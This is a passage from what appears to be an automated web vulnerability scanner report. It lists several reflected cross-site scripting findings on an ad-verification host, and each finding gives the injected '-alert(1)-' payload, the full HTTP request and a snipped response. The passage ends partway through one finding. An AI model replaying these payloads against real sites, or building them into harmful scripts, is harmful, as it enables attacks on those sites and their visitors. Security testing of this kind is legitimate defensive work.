Miwe098c61";alert(1)//bb08c81a782.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe098c61";alert(1)//bb08c81a782"] = new Miwe098c61";alert(1)//bb08c81a782();


4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5158"-alert(1)-"293bd78879f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DA8C3EB6580BDA74A6A3C507C2885868; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
yNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47
...[SNIP]...

4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d5a4"-alert(1)-"8cca82e364c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9E55FC0BFE83E04647B4209467C8C4A9; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
CRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAd
...[SNIP]...

4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a71"-alert(1)-"18fbcbf40bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BD959B6AEF33638B8DF2F06BF8277F0E; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
Y2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSg
...[SNIP]...

4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f192d"-alert(1)-"d55e5a7138a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D0E6B1852B91D5D61A99A14AD17B596F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMD
...[SNIP]...

4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacc9"-alert(1)-"5c371b0f231 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A488FCBEAF7E64AD334958F04D83C6F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:23 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
GVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3Lmd
...[SNIP]...

4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3069"-alert(1)-"bcb2ac021ed was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F6EBC3827678CA9C1C278DAD00E99C2; Path=/
